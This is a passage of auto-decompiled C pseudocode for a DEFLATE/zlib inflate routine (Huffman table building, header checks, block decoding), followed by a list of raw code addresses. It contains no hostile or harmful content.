    																			_t972 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1366 & 0x00000001) +  !_t972) * 2));
    																			_t1366 = _t1366 + 1;
    																			__eflags = _t972;
    																		} while (_t972 < 0);
    																		goto L230;
    																	} else {
    																		_t1366 = _t972 >> 9;
    																		L230:
    																		_t1297 = _v28;
    																		_v12 = _v12 >> _t1366;
    																		_t1091 = _t1091 - _t1366;
    																		 *_t1297 = _v16;
    																		__eflags = _t972 & 0x00000100;
    																		if((_t972 & 0x00000100) != 0) {
    																			_t473 =  &_v28;
    																			 *_t473 = _v28 + 1;
    																			__eflags =  *_t473;
    																			_v16 = _t972;
    																			goto L256;
    																		}
    																		_v28 = _v28 + 2;
    																		 *(_t1297 + 1) = _t972;
    																		continue;
    																	}
    																}
    															}
    															__eflags = _t1091 - 0xf;
    															if(_t1091 >= 0xf) {
    																L248:
    																_t905 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    																__eflags = _t905;
    																if(_t905 < 0) {
    																	_t1348 = 0xa;
    																	do {
    																		_t905 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1348 & 0x00000001) +  !_t905) * 2));
    																		_t1348 = _t1348 + 1;
    																		__eflags = _t905;
    																	} while (_t905 < 0);
    																	L252:
    																	_v12 = _v12 >> _t1348;
    																	_t1091 = _t1091 - _t1348;
    																	_v16 = _t905;
    																	__eflags = _t905 - 0x100;
    																	if(_t905 >= 0x100) {
    																		goto L256;
    																	}
    																	L253:
    																	_t953 = _v28;
    																	__eflags = _t953 - _v48;
    																	if(_t953 >= _v48) {
    																		_v20 = 2;
    																		 *_t1381 = 0x18;
    																		goto L396;
    																	}
    																	 *_t953 = _v16;
    																	_v28 = _t953 + 1;
    																	goto L215;
    																}
    																_t1348 = _t905 >> 9;
    																_t905 = _t905 & 0x000001ff;
    																goto L252;
    															}
    															__eflags = _t902 - 2;
    															if(_t902 >= 2) {
    																_t955 = _v8;
    																_v8 =  &(_t955[2]);
    																_v12 = _v12 | (_t955[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t955 & 0x000000ff) << _t1091;
    																_t1091 = _t1091 + 0x10;
    																__eflags = _t1091;
    																goto L248;
    															}
    															L234:
    															_t959 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    															__eflags = _t959;
    															if(_t959 < 0) {
    																_t1144 = 0xa;
    																__eflags = _t1091 - _t1144;
    																if(_t1091 <= _t1144) {
    																	L241:
    																	__eflags = _v8 - _v24;
    																	if(_v8 < _v24) {
    																		_t962 =  *_v8 & 0x000000ff;
    																		_t448 =  &_v8;
    																		 *_t448 = _v8 + 1;
    																		__eflags =  *_t448;
    																		L245:
    																		_t963 = _t962 << _t1091;
    																		_t1091 = _t1091 + 8;
    																		_v12 = _v12 | _t963;
    																		__eflags = _t1091 - 0xf;
    																		if(_t1091 < 0xf) {
    																			goto L234;
    																		}
    																		goto L248;
    																	}
    																	L242:
    																	__eflags = _a24 & 0x00000002;
    																	if((_a24 & 0x00000002) != 0) {
    																		_v20 = 1;
    																		 *_t1381 = 0x17;
    																		goto L396;
    																	}
    																	_t962 = 0;
    																	goto L245;
    																} else {
    																	goto L239;
    																}
    																while(1) {
    																	L239:
    																	_t959 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1144 & 0x00000001) +  !_t959) * 2));
    																	_t1144 = _t1144 + 1;
    																	__eflags = _t959;
    																	if(_t959 >= 0) {
    																		goto L248;
    																	}
    																	_t441 = _t1144 + 1; // 0xc
    																	__eflags = _t1091 - _t441;
    																	if(_t1091 >= _t441) {
    																		continue;
    																	}
    																	goto L241;
    																}
    																goto L248;
    															}
    															_t965 = _t959 >> 9;
    															__eflags = _t965;
    															if(_t965 == 0) {
    																goto L241;
    															}
    															__eflags = _t1091 - _t965;
    															if(_t1091 >= _t965) {
    																goto L248;
    															}
    															goto L241;
    														}
    														_t209 =  &(_t1381[0x10]); // 0x40
    														_t1368 = _t209 + _t900 * 0xda0;
    														memset( &_v192, 0, 0x40);
    														_t211 = _t1368 + 0x120; // 0x160
    														memset(_t211, 0, 0x800);
    														_t212 = _t1368 + 0x920; // 0x960
    														memset(_t212, 0, 0x480);
    														_t988 =  *((intOrPtr*)(_t1381 + 0x2c + _t1381[6] * 4));
    														_t1383 = _t1383 + 0x24;
    														_t1150 = 0;
    														_v44 = _t988;
    														__eflags = _t988;
    														if(_t988 <= 0) {
    															L143:
    															_t1151 = 0;
    															_t1104 = 0;
    															__eflags = 0;
    															_v124 = 0;
    															_v128 = 0;
    															_t989 = 4;
    															do {
    																_t1298 =  *((intOrPtr*)(_t1382 + _t989 - 0xbc));
    																_t1151 = _t1151 + _t1298 + _t1151 + _t1298;
    																 *((intOrPtr*)(_t1382 + _t989 - 0x78)) = _t1151;
    																_t989 = _t989 + 4;
    																_t1104 = _t1104 + _t1298;
    																__eflags = _t989 - 0x3c;
    															} while (_t989 <= 0x3c);
    															__eflags = _t1151 - 0x10000;
    															if(_t1151 == 0x10000) {
    																L147:
    																_v20 = _v20 | 0xffffffff;
    																_v52 = _v52 & 0x00000000;
    																__eflags = _v44;
    																_t1091 = _v32;
    																if(_v44 <= 0) {
    																	L174:
    																	__eflags = _t1381[6] - 2;
    																	if(_t1381[6] != 2) {
    																		L214:
    																		_t1381[6] = _t1381[6] - 1;
    																		goto L139;
    																	}
    																	_t300 =  &_v16;
    																	 *_t300 = _v16 & 0x00000000;
    																	__eflags =  *_t300;
    																	L176:
    																	__eflags = _v16 - _t1381[0xc] + _t1381[0xb];
    																	if(_v16 >= _t1381[0xc] + _t1381[0xb]) {
    																		_t992 = _t1381[0xb];
    																		__eflags = _t1381[0xc] + _t992 - _v16;
    																		if(_t1381[0xc] + _t992 != _v16) {
    																			L357:
    																			 *_t1381 = 0x15;
    																			goto L395;
    																		}
    																		memcpy( &(_t1381[0x10]),  &(_t1381[0xa49]), _t992);
    																		memcpy( &(_t1381[0x378]), _t1381 + _t1381[0xb] + 0x2924, _t1381[0xc]);
    																		_t1383 = _t1383 + 0x18;
    																		goto L214;
    																	}
    																	__eflags = _t1091 - 0xf;
    																	if(_t1091 >= 0xf) {
    																		L193:
    																		_t1002 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
    																		__eflags = _t1002;
    																		if(_t1002 < 0) {
    																			_t1369 = 0xa;
    																			do {
    																				_t1002 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1369 & 0x00000001) +  !_t1002) * 2));
    																				_t1369 = _t1369 + 1;
    																				__eflags = _t1002;
    																			} while (_t1002 < 0);
    																			L197:
    																			_v12 = _v12 >> _t1369;
    																			_t1091 = _t1091 - _t1369;
    																			_v40 = _t1002;
    																			_v32 = _t1091;
    																			__eflags = _t1002 - 0x10;
    																			if(__eflags >= 0) {
    																				if(__eflags != 0) {
    																					L201:
    																					_t1157 =  *((char*)(_t1002 + 0x3b6634));
    																					_v36 = _t1157;
    																					__eflags = _t1091 - _t1157;
    																					if(_t1091 >= _t1157) {
    																						L208:
    																						_t1004 = _v40;
    																						_t1091 = _t1091 - _t1157;
    																						_v32 = _t1091;
    																						_v12 = _v12 >> _t1157;
    																						_t1375 = ((1 << _t1157) - 0x00000001 & _v12) +  *((char*)(_t1004 + 0x3b6638));
    																						__eflags = _t1004 - 0x10;
    																						if(_t1004 != 0x10) {
    																							_t1005 = 0;
    																							__eflags = 0;
    																						} else {
    																							_t1005 =  *( &(_t1381[0xa48]) + _v16) & 0x000000ff;
    																						}
    																						memset( &(_t1381[0xa49]) + _v16, _t1005, _t1375);
    																						_t1383 = _t1383 + 0xc;
    																						_v16 = _v16 + _t1375;
    																						goto L176;
    																					}
    																					L202:
    																					__eflags = _v8 - _v24;
    																					if(_v8 < _v24) {
    																						_t1012 =  *_v8 & 0x000000ff;
    																						_t357 =  &_v8;
    																						 *_t357 = _v8 + 1;
    																						__eflags =  *_t357;
    																						L206:
    																						_t1013 = _t1012 << _t1091;
    																						_t1091 = _t1091 + 8;
    																						_v12 = _v12 | _t1013;
    																						__eflags = _t1091 - _v36;
    																						if(_t1091 < _v36) {
    																							goto L202;
    																						}
    																						_t1157 = _v36;
    																						goto L208;
    																					}
    																					L203:
    																					__eflags = _a24 & 0x00000002;
    																					if((_a24 & 0x00000002) != 0) {
    																						_v20 = 1;
    																						 *_t1381 = 0x12;
    																						goto L396;
    																					}
    																					_t1012 = 0;
    																					goto L206;
    																				}
    																				__eflags = _v16;
    																				if(_v16 == 0) {
    																					L355:
    																					 *_t1381 = 0x11;
    																					goto L395;
    																				}
    																				goto L201;
    																			}
    																			_v16 = _v16 + 1;
    																			 *( &(_t1381[0xa49]) + _v16) = _t1002;
    																			goto L176;
    																		}
    																		_t1369 = _t1002 >> 9;
    																		_t1002 = _t1002 & 0x000001ff;
    																		goto L197;
    																	}
    																	_t1014 = _v8;
    																	__eflags = _v24 - _t1014 - 2;
    																	if(_v24 - _t1014 >= 2) {
    																		_t327 = _t1091 + 8; // 0xa
    																		_v8 =  &(_t1014[2]);
    																		_v12 = _v12 | (_t1014[1] & 0x000000ff) << _t327 | ( *_t1014 & 0x000000ff) << _t1091;
    																		_t1091 = _t1091 + 0x10;
    																		__eflags = _t1091;
    																		goto L193;
    																	}
    																	L179:
    																	_t1018 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
    																	__eflags = _t1018;
    																	if(_t1018 < 0) {
    																		_t1163 = 0xa;
    																		__eflags = _t1091 - _t1163;
    																		if(_t1091 <= _t1163) {
    																			L186:
    																			__eflags = _v8 - _v24;
    																			if(_v8 < _v24) {
    																				_t1021 =  *_v8 & 0x000000ff;
    																				_t322 =  &_v8;
    																				 *_t322 = _v8 + 1;
    																				__eflags =  *_t322;
    																				L190:
    																				_t1022 = _t1021 << _t1091;
    																				_t1091 = _t1091 + 8;
    																				_v12 = _v12 | _t1022;
    																				__eflags = _t1091 - 0xf;
    																				if(_t1091 < 0xf) {
    																					goto L179;
    																				}
    																				goto L193;
    																			}
    																			L187:
    																			__eflags = _a24 & 0x00000002;
    																			if((_a24 & 0x00000002) != 0) {
    																				_v20 = 1;
    																				 *_t1381 = 0x10;
    																				goto L396;
    																			}
    																			_t1021 = 0;
    																			goto L190;
    																		} else {
    																			goto L184;
    																		}
    																		while(1) {
    																			L184:
    																			_t1018 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1163 & 0x00000001) +  !_t1018) * 2));
    																			_t1163 = _t1163 + 1;
    																			__eflags = _t1018;
    																			if(_t1018 >= 0) {
    																				goto L193;
    																			}
    																			_t315 = _t1163 + 1; // 0xc
    																			__eflags = _t1091 - _t315;
    																			if(_t1091 >= _t315) {
    																				continue;
    																			}
    																			goto L186;
    																		}
    																		goto L193;
    																	}
    																	_t1024 = _t1018 >> 9;
    																	__eflags = _t1024;
    																	if(_t1024 == 0) {
    																		goto L186;
    																	}
    																	__eflags = _t1091 - _t1024;
    																	if(_t1091 >= _t1024) {
    																		goto L193;
    																	}
    																	goto L186;
    																} else {
    																	goto L148;
    																}
    																do {
    																	L148:
    																	_t1168 =  *(_v52 + _t1368) & 0x000000ff;
    																	_t1025 = 0;
    																	__eflags = _t1168;
    																	if(_t1168 == 0) {
    																		goto L173;
    																	}
    																	_t1312 = _t1382 + _t1168 * 4 - 0x7c;
    																	_t1105 =  *_t1312;
    																	_v44 = _t1105;
    																	 *_t1312 = _t1105 + 1;
    																	_t1313 = _t1168;
    																	__eflags = _t1168;
    																	if(_t1168 == 0) {
    																		L151:
    																		__eflags = _t1168 - 0xa;
    																		if(_t1168 > 0xa) {
    																			_t276 = (_t1025 & 0x000003ff) * 2; // 0x160
    																			_t1107 = _t1368 + _t276 + 0x120;
    																			_t1316 =  *_t1107;
    																			__eflags = _t1316;
    																			if(_t1316 == 0) {
    																				_t1316 = _v20;
    																				_t279 =  &_v20;
    																				 *_t279 = _v20 - 2;
    																				__eflags =  *_t279;
    																				 *_t1107 = _t1316;
    																			}
    																			_t1027 = _t1025 >> 9;
    																			__eflags = _t1168 - 0xb;
    																			if(_t1168 <= 0xb) {
    																				L171:
    																				_t1030 = (_t1027 >> 0x00000001 & 0x00000001) - _t1316;
    																				__eflags = _t1030;
    																				 *((short*)(_t1368 + 0x91e + _t1030 * 2)) = _v52;
    																				L172:
    																				_t1091 = _v32;
    																				goto L173;
    																			} else {
    																				_t1108 = _t1168 - 0xb;
    																				do {
    																					_t1027 = _t1027 >> 1;
    																					_t1175 = _t1368 + (0x48f - _t1316 - (_t1027 & 0x00000001)) * 2;
    																					_t1318 =  *0x48f & 0x0000ffff;
    																					__eflags = _t1318;
    																					if(_t1318 != 0) {
    																						_t1316 = _t1318;
    																					} else {
    																						_t1316 = _v20;
    																						_v20 = _v20 - 2;
    																						 *_t1175 = _t1316;
    																					}
    																					_t1108 = _t1108 - 1;
    																					__eflags = _t1108;
    																				} while (_t1108 != 0);
    																				goto L171;
    																			}
    																		}
    																		_v44 = (_t1168 << 0x00000009 | _v52) & 0x0000ffff;
    																		__eflags = _t1025 - 0x400;
    																		if(_t1025 >= 0x400) {
    																			goto L172;
    																		}
    																		__eflags = 1;
    																		_t250 = _t1025 * 2; // 0x160
    																		_t1176 = _t1368 + _t250 + 0x120;
    																		do {
    																			_t1025 = _t1025 + 1;
    																			 *_t1176 = _v44;
    																			_t1176 = _t1176 + 2;
    																			__eflags = _t1025 - 0x400;
    																		} while (_t1025 < 0x400);
    																		goto L172;
    																	} else {
    																		goto L150;
    																	}
    																	do {
    																		L150:
    																		_v44 = _v44 >> 1;
    																		_t1025 = _t1025 + _t1025 | _v44 & 0x00000001;
    																		_t1313 = _t1313 - 1;
    																		__eflags = _t1313;
    																	} while (_t1313 != 0);
    																	goto L151;
    																	L173:
    																	_v52 = _v52 + 1;
    																	_t1026 = _t1381[6];
    																	__eflags = _v52 -  *((intOrPtr*)(_t1381 + 0x2c + _t1026 * 4));
    																} while (_v52 <  *((intOrPtr*)(_t1381 + 0x2c + _t1026 * 4)));
    																goto L174;
    															}
    															__eflags = _t1104 - 1;
    															if(_t1104 > 1) {
    																_t1091 = _v32;
    																L353:
    																 *_t1381 = 0x23;
    																goto L395;
    															}
    															goto L147;
    														}
    														_t1299 =  *(_t1381 + 0x2c + _t1381[6] * 4);
    														do {
    															 *((intOrPtr*)(_t1382 + ( *(_t1150 + _t1368) & 0x000000ff) * 4 - 0xbc)) =  *((intOrPtr*)(_t1382 + ( *(_t1150 + _t1368) & 0x000000ff) * 4 - 0xbc)) + 1;
    															_t1150 = _t1150 + 1;
    															__eflags = _t1150 - _t1299;
    														} while (_t1150 < _t1299);
    														goto L143;
    													}
    													_t172 = _t1347 + 0x3b6640; // 0x2000405
    													_t1177 =  *_t172;
    													__eflags = _t1091 - _t1177;
    													if(_t1091 >= _t1177) {
    														L135:
    														 *(_t1381 + 0x2c + _t1347 * 4) = (1 << _t1177) - 0x00000001 & _v12;
    														_t189 = _t1347 + 0x3b6640; // 0x40505
    														_t1178 =  *_t189;
    														_v12 = _v12 >> _t1178;
    														 *(_t1381 + 0x2c + _t1347 * 4) =  *(_t1381 + 0x2c + _t1347 * 4) +  *((intOrPtr*)(0x3b6634 + _t1347 * 4));
    														_t1091 = _t1091 - _t1178;
    														_v32 = _t1091;
    														_t1347 = _t1347 + 1;
    														goto L127;
    													}
    													L129:
    													__eflags = _v8 - _v24;
    													if(_v8 < _v24) {
    														_t1043 =  *_v8 & 0x000000ff;
    														_t179 =  &_v8;
    														 *_t179 = _v8 + 1;
    														__eflags =  *_t179;
    														L133:
    														_t1044 = _t1043 << _t1091;
    														_t1091 = _t1091 + 8;
    														_v12 = _v12 | _t1044;
    														_t1045 = _v16;
    														_t184 = _t1045 + 0x3b6640; // 0x40505
    														_t1177 =  *_t184;
    														__eflags = _t1091 - _t1177;
    														if(_t1091 < _t1177) {
    															goto L129;
    														}
    														_t1347 = _t1045;
    														goto L135;
    													}
    													L130:
    													__eflags = _a24 & 0x00000002;
    													if((_a24 & 0x00000002) != 0) {
    														_v20 = 1;
    														 *_t1381 = 0xb;
    														goto L396;
    													}
    													_t1043 = 0;
    													goto L133;
    												}
    												_t1180 = 8;
    												_t1112 =  &(_t1381[0x10]);
    												_t1381[0xb] = 0x120;
    												_t1381[0xc] = 0x20;
    												memset( &(_t1381[0x378]), 0x5050505, _t1180 << 2);
    												memset(_t1112, 8, 0x90);
    												_t1113 = _t1112 + 0x90;
    												memset(_t1113, 9, 0x70);
    												_t1182 = 6;
    												memset(_t1113 + 0x70, 0x7070707, _t1182 << 2);
    												_t1383 = _t1383 + 0x30;
    												_t1091 = _v32;
    												asm("stosd");
    												asm("stosd");
    												goto L139;
    											}
    											__eflags = _a24 & 0x00000001;
    											if((_a24 & 0x00000001) == 0) {
    												goto L392;
    											}
    											_t1336 = _v24;
    											L369:
    											__eflags = _t1091 - (_t1091 & 0x00000007);
    											if(_t1091 < (_t1091 & 0x00000007)) {
    												__eflags = _v8 - _t1336;
    												if(_v8 < _t1336) {
    													_t875 =  *_v8 & 0x000000ff;
    													_t696 =  &_v8;
    													 *_t696 = _v8 + 1;
    													__eflags =  *_t696;
    													L368:
    													_v12 = _v12 | _t875 << _t1091;
    													_t1091 = _t1091 + 8;
    													__eflags = _t1091;
    													goto L369;
    												}
    												L365:
    												__eflags = _a24 & 0x00000002;
    												if((_a24 & 0x00000002) != 0) {
    													_v20 = 1;
    													 *_t1381 = 0x20;
    													goto L396;
    												}
    												_t875 = 0;
    												goto L368;
    											}
    											_t1186 = _t1091 & 0x00000007;
    											_v12 = _v12 >> _t1186;
    											_t1091 = _t1091 - _t1186;
    											_v16 = _v16 & 0x00000000;
    											goto L384;
    										}
    										__eflags = _t1091;
    										if(_t1091 != 0) {
    											goto L95;
    										}
    										L103:
    										__eflags = _v16;
    										if(_v16 == 0) {
    											goto L113;
    										}
    										L104:
    										__eflags = _v28 - _v48;
    										if(_v28 >= _v48) {
    											_v20 = 2;
    											 *_t1381 = 9;
    											goto L396;
    										}
    										L105:
    										__eflags = _v8 - _t1336;
    										if(_v8 >= _t1336) {
    											__eflags = _a24 & 0x00000002;
    											if((_a24 & 0x00000002) == 0) {
    												goto L393;
    											}
    											_v20 = 1;
    											 *_t1381 = 0x26;
    											goto L396;
    										}
    										_t880 = _v48 - _v28;
    										_t1379 = _t1336 - _v8;
    										_t1222 = _t880;
    										__eflags = _t880 - _t1379;
    										if(_t880 >= _t1379) {
    											_t1222 = _t1379;
    										}
    										__eflags = _t1222 - _v16;
    										if(_t1222 >= _v16) {
    											_t1379 = _v16;
    										} else {
    											__eflags = _t880 - _t1379;
    											if(_t880 < _t1379) {
    												_t1379 = _t880;
    											}
    										}
    										memcpy(_v28, _v8, _t1379);
    										_v8 = _v8 + _t1379;
    										_v28 = _v28 + _t1379;
    										_t1383 = _t1383 + 0xc;
    										_v16 = _v16 - _t1379;
    										_t1336 = _v24;
    										goto L103;
    									}
    									__eflags = _v8 - _t1336;
    									if(_v8 >= _t1336) {
    										goto L92;
    									}
    									_t852 =  *_v8 & 0x000000ff;
    									_v8 = _v8 + 1;
    									goto L94;
    								}
    								_t852 =  *_t1243 & 0x000000ff;
    								_v8 =  &(_t1243[1]);
    								goto L94;
    							}
    							_t1053 = _t851 - 1;
    							__eflags = _t1053;
    							if(_t1053 == 0) {
    								goto L99;
    							}
    							__eflags = _t1053 == 1;
    							if(_t1053 == 1) {
    								goto L301;
    							}
    							goto L396;
    						}
    						if(__eflags == 0) {
    							goto L105;
    						}
    						__eflags = _t821 - 0x22;
    						if(__eflags > 0) {
    							_t1055 = _t821 - 0x23;
    							__eflags = _t1055;
    							if(_t1055 == 0) {
    								goto L353;
    							}
    							_t1056 = _t1055 - 1;
    							__eflags = _t1056;
    							if(_t1056 == 0) {
    								L36:
    								 *_t1381 = 0x24;
    								goto L395;
    							}
    							__eflags = _t1056 != 1;
    							if(_t1056 != 1) {
    								goto L396;
    							}
    							goto L81;
    						}
    						if(__eflags == 0) {
    							goto L392;
    						}
    						_t1058 = _t821 - 0x19;
    						__eflags = _t1058;
    						if(_t1058 == 0) {
    							__eflags = _t1243 - _t1336;
    							if(_t1243 >= _t1336) {
    								goto L260;
    							}
    							_t951 =  *_t1243 & 0x000000ff;
    							_v8 =  &(_t1243[1]);
    							goto L263;
    						}
    						_t1059 = _t1058 - 1;
    						__eflags = _t1059;
    						if(_t1059 == 0) {
    							__eflags = _t1243 - _t1336;
    							if(_t1243 >= _t1336) {
    								goto L276;
    							}
    							_t940 =  *_t1243 & 0x000000ff;
    							_v8 =  &(_t1243[1]);
    							goto L279;
    						}
    						_t1060 = _t1059 - 1;
    						__eflags = _t1060;
    						if(_t1060 == 0) {
    							__eflags = _t1243 - _t1336;
    							if(_t1243 >= _t1336) {
    								goto L289;
    							}
    							_t926 =  *_t1243 & 0x000000ff;
    							_v8 =  &(_t1243[1]);
    							goto L292;
    						}
    						__eflags = _t1060 != 5;
    						if(_t1060 != 5) {
    							goto L396;
    						}
    						__eflags = _t1243 - _t1336;
    						if(_t1243 >= _t1336) {
    							goto L365;
    						}
    						_t875 =  *_t1243 & 0x000000ff;
    						_v8 =  &(_t1243[1]);
    						goto L368;
    					}
    					if(_t1389 == 0) {
    						goto L253;
    					}
    					_t1390 = _t821 - 0xa;
    					if(_t1390 > 0) {
    						_t1062 = _t821 - 0xb;
    						__eflags = _t1062;
    						if(_t1062 == 0) {
    							_t1226 = _t1243;
    							__eflags = _t1226 - _t1336;
    							if(_t1226 >= _t1336) {
    								goto L130;
    							}
    							_t1043 =  *_t1226 & 0x000000ff;
    							_v8 =  &(_t1226[1]);
    							goto L133;
    						}
    						_t1063 = _t1062 - 3;
    						__eflags = _t1063;
    						if(_t1063 == 0) {
    							_t1228 = _t1243;
    							__eflags = _t1228 - _t1336;
    							if(_t1228 >= _t1336) {
    								goto L157;
    							}
    							_t896 =  *_t1228 & 0x000000ff;
    							_v8 =  &(_t1228[1]);
    							goto L160;
    						}
    						_t1065 = _t1063;
    						__eflags = _t1065;
    						if(_t1065 == 0) {
    							_t1230 = _t1243;
    							__eflags = _t1230 - _t1336;
    							if(_t1230 >= _t1336) {
    								goto L187;
    							}
    							_t1021 =  *_t1230 & 0x000000ff;
    							_v8 =  &(_t1230[1]);
    							goto L190;
    						}
    						_t1066 = _t1065 - 1;
    						__eflags = _t1066;
    						if(_t1066 == 0) {
    							goto L355;
    						}
    						_t1067 = _t1066 - 1;
    						__eflags = _t1067;
    						if(_t1067 == 0) {
    							_t1232 = _t1243;
    							__eflags = _t1232 - _t1336;
    							if(_t1232 >= _t1336) {
    								goto L203;
    							}
    							_t1012 =  *_t1232 & 0x000000ff;
    							_v8 =  &(_t1232[1]);
    							goto L206;
    						}
    						_t1068 = _t1067 - 3;
    						__eflags = _t1068;
    						if(_t1068 == 0) {
    							goto L357;
    						}
    						__eflags = _t1068 != 0;
    						if(_t1068 != 0) {
    							goto L396;
    						}
    						_t1234 = _t1243;
    						__eflags = _t1234 - _t1336;
    						if(_t1234 >= _t1336) {
    							goto L242;
    						}
    						_t962 =  *_t1234 & 0x000000ff;
    						_v8 =  &(_t1234[1]);
    						goto L245;
    					}
    					if(_t1390 == 0) {
    						goto L349;
    					}
    					if(_t821 > 9) {
    						goto L396;
    					}
    					switch( *((intOrPtr*)(_t821 * 4 +  &M003A390B))) {
    						case 0:
    							_t1091 = 0;
    							_t1381[3] = 0;
    							_t1381[2] = 0;
    							_v36 = 0;
    							_v16 = 0;
    							_v40 = 0;
    							_v32 = 0;
    							_v12 = 0;
    							_t1381[7] = 1;
    							_t1381[4] = 1;
    							if((_a24 & 1) == 0) {
    								goto L121;
    							}
    							goto L12;
    						case 1:
    							L12:
    							_t1073 = _t1243;
    							if(_t1073 >= _t1336) {
    								__eflags = _a24 & 0x00000002;
    								if((_a24 & 0x00000002) == 0) {
    									_t54 =  &(_t1381[2]);
    									 *_t54 = _t1381[2] & 0x00000000;
    									__eflags =  *_t54;
    									goto L17;
    								}
    								_v20 = 1;
    								 *_t1381 = 1;
    								goto L396;
    							} else {
    								_t1381[2] =  *_t1073 & 0x000000ff;
    								_v8 =  &(_t1073[1]);
    								L17:
    								_t1074 = _v8;
    								if(_t1074 >= _t1336) {
    									goto L21;
    								}
    								_v8 = _v8 + 1;
    								_t1381[3] =  *_t1074 & 0x000000ff;
    								goto L24;
    							}
    						case 2:
    							__eax = __edx;
    							__eflags = __eax - __edi;
    							if(__eax >= __edi) {
    								L21:
    								__eflags = _a24 & 0x00000002;
    								if((_a24 & 0x00000002) == 0) {
    									_t66 =  &(_t1381[3]);
    									 *_t66 = _t1381[3] & 0x00000000;
    									__eflags =  *_t66;
    									L24:
    									_t1380 = _t1381[2];
    									_t1236 = _t1381[3];
    									_push(0x1f);
    									_pop(_t1114);
    									_t1334 = ((_t1380 << 8) + _t1236) % _t1114;
    									if(_t1334 != 0 || (_t1236 & 0x00000020) != 0 || (_t1380 & 0x0000000f) != 8) {
    										_v16 = 1;
    									} else {
    										_v16 = _v16 & _t1334;
    									}
    									if(_v44 == 0) {
    										_t1081 = 1 << (_t1380 >> 4) + 8;
    										if(1 > 0x8000 || _v60 + 1 < _t1081) {
    											_t1083 = 1;
    											__eflags = 1;
    										} else {
    											_t1083 = 0;
    										}
    										_v16 = _v16 | _t1083;
    									}
    									_t1091 = _v32;
    									if(_v16 == 0) {
    										goto L121;
    									} else {
    										goto L36;
    									}
    								}
    								_v20 = 1;
    								 *_t1381 = 2;
    								goto L396;
    							}
    							__ecx =  *__eax & 0x000000ff;
    							__eax = __eax + 1;
    							 *(__esi + 0xc) = __ecx;
    							_v8 = __eax;
    							goto L24;
    						case 3:
    							__ecx = __edx;
    							__eflags = __ecx - __edi;
    							if(__ecx >= __edi) {
    								goto L117;
    							}
    							__eax =  *__ecx & 0x000000ff;
    							_v8 = __ecx;
    							goto L120;
    						case 4:
    							goto L396;
    						case 5:
    							__ecx = __edx;
    							__eflags = __ecx - __edi;
    							if(__ecx >= __edi) {
    								goto L318;
    							}
    							__eax =  *__ecx & 0x000000ff;
    							_v8 = __ecx;
    							goto L321;
    						case 6:
    							__ecx = __edx;
    							__eflags = __ecx - __edi;
    							if(__ecx >= __edi) {
    								goto L330;
    							}
    							__eax =  *__ecx & 0x000000ff;
    							_v8 = __ecx;
    							goto L333;
    						case 7:
    							__eax = __edx;
    							__eflags = __eax - __edi;
    							if(__eax >= __edi) {
    								goto L327;
    							}
    							__cl =  *__eax;
    							__edx = _v16;
    							__eax = __eax + 1;
    							 *((char*)(_v16 + __esi + 0x2920)) = __cl;
    							_v8 = __eax;
    							goto L337;
    						case 8:
    							goto L104;
    					}
    				}
    			}

    0x00000000
    0x003a29fa
    0x003a29dc
    0x003a29dc
    0x003a29e0
    0x003a358d
    0x003a3594
    0x00000000
    0x003a3594
    0x003a29e6
    0x00000000
    0x003a29e6
    0x003a2a05
    0x003a2a09
    0x003a2a0c
    0x003a2a0f
    0x003a2a12
    0x003a2a12
    0x003a2a14
    0x003a2a17
    0x003a2a1a
    0x003a345a
    0x003a345f
    0x003a3461
    0x003a3434
    0x003a3437
    0x003a344a
    0x003a344d
    0x003a344d
    0x003a344d
    0x003a3450
    0x003a3454
    0x003a3457
    0x003a3457
    0x00000000
    0x003a3457
    0x003a3439
    0x003a3439
    0x003a343d
    0x003a359f
    0x003a35a6
    0x00000000
    0x003a35a6
    0x003a3443
    0x00000000
    0x003a3443
    0x003a3465
    0x003a3468
    0x003a346b
    0x003a346d
    0x003a346d
    0x003a346d
    0x003a3471
    0x003a3471
    0x003a3475
    0x003a3514
    0x003a3528
    0x003a352b
    0x003a352d
    0x00000000
    0x00000000
    0x003a3533
    0x00000000
    0x003a3533
    0x003a347b
    0x003a347d
    0x003a34c7
    0x003a34c7
    0x003a34ca
    0x003a34a1
    0x003a34a4
    0x003a34b7
    0x003a34ba
    0x003a34ba
    0x003a34ba
    0x003a34bd
    0x003a34c1
    0x003a34c4
    0x003a34c4
    0x00000000
    0x003a34c4
    0x003a34a6
    0x003a34a6
    0x003a34aa
    0x003a35b1
    0x003a35b8
    0x00000000
    0x003a35b8
    0x003a34b0
    0x00000000
    0x003a34b0
    0x003a34d2
    0x003a34d6
    0x003a34dd
    0x003a34f4
    0x003a34f4
    0x00000000
    0x003a34f4
    0x003a3482
    0x003a3485
    0x003a34ea
    0x003a34ea
    0x003a34ea
    0x003a34ed
    0x00000000
    0x003a34ed
    0x003a3487
    0x003a3487
    0x003a348b
    0x003a35c3
    0x003a35ca
    0x00000000
    0x003a35ca
    0x003a3494
    0x00000000
    0x003a3494
    0x003a2a20
    0x003a2a23
    0x003a35d5
    0x003a35d5
    0x00000000
    0x003a35d5
    0x003a2a29
    0x003a2a2c
    0x003a2a91
    0x003a2a91
    0x003a2a93
    0x003a2a93
    0x003a2a96
    0x003a2a99
    0x003a2b17
    0x003a2b1c
    0x003a2b1f
    0x003a2b1f
    0x003a2b1f
    0x003a2b23
    0x003a2b26
    0x003a2b29
    0x003a2c9a
    0x003a2c9a
    0x003a2c9d
    0x003a2c74
    0x003a2c77
    0x003a2c8a
    0x003a2c8d
    0x003a2c8d
    0x003a2c8d
    0x003a2c90
    0x003a2c94
    0x003a2c97
    0x003a2c97
    0x00000000
    0x003a2c97
    0x003a2c79
    0x003a2c79
    0x003a2c7d
    0x003a35f2
    0x003a35f9
    0x00000000
    0x003a35f9
    0x003a2c83
    0x00000000
    0x003a2c83
    0x003a2ca5
    0x003a2cac
    0x003a2cb3
    0x003a2cb6
    0x003a2cb9
    0x003a2cbc
    0x00000000
    0x003a2cbc
    0x003a2b2f
    0x003a2b36
    0x003a2b36
    0x003a2b39
    0x003a2b3b
    0x003a2f54
